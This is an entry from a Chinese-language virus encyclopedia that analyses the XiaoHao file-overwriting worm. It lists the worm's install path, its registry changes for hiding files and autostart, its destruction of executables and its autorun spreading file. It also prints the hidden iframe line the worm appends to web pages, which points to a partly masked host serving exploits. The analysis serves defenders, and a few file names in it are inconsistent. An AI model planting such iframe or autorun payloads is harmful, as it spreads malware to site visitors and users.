病毒大百科

这是一个恶性的覆盖文件的病毒，它能覆盖用户机器上的exe文件，
使机器上的exe文件全部损坏，无法修复，此外它还会感染网页与脚本文件。

1：复制本体
病毒运行后，会把自己复制到以下目录:
%Windows%\\System32\\exloroe.exe

2：更改注册表
病毒会更改以下两处注册表值

不显示隐藏文件
HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\ShowAll
CheckedValue = 0x00

添加自启动
HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\{H9I12RB03-AB-B70-7-11d2-9CBD-0O00FS7AH6-9E2121BHJLK}
stubpath = %SystemRoot%\\system32\\exploroe.exe

3：修改文件
病毒会枚举用户机器上的文件，并修改以下扩展名的文件：
a：exe文件
病毒发现扩展名为exe的文件时，会检测它是否为正确的PE文件，若发现它是正常的PE文件，
则把自己覆盖到目标文件，若目标文件大小比病毒体大时，则病毒体会覆盖在目标文件的前面部分;
若目标文件比病毒体要小时，病毒体就会直接替换目标文件。病毒会使用户机器上的PE文件全部损坏，
并且无法修复，并且把没有感染的文件加入隐藏的属性。
但病毒不会感染以下文件名的文件：
config.exe
XiaoHao.exe
xiaohao.exe

b：jsp、php、aspx、asp、htm、html文件
病毒若发现以上扩展名的文件时，在文件尾部加一个隐藏的框架
iframe src=http://xiaohao.****.biz/xiaohao.htm width=0 height=0
该网页会利用3个已知的漏洞下载病毒，它们分别是：MS06-014、MS06-046、MS07-017

c：记录文件
病毒会把自己修改过的文件记录在一个txt文件里面
c:\Jilu.txt

4：利用autorun传播
病毒会在每一个分区的根目录下生成autorun.ini文件，并利用它传播
[Autorun]
open=Xiaohao.exe
shellexecute=Xiaohao.exe
shell\Auto\command=Xiaohao.exe

Xiaohao.exe是病毒体的一个拷贝

5：更改窗口名
病毒会把当前活动窗口的窗口名改为"已中毒 X14o-H4o',27h,'s Virus"

6：更改系统时间
病毒会把系统的时间改为2005年1月17日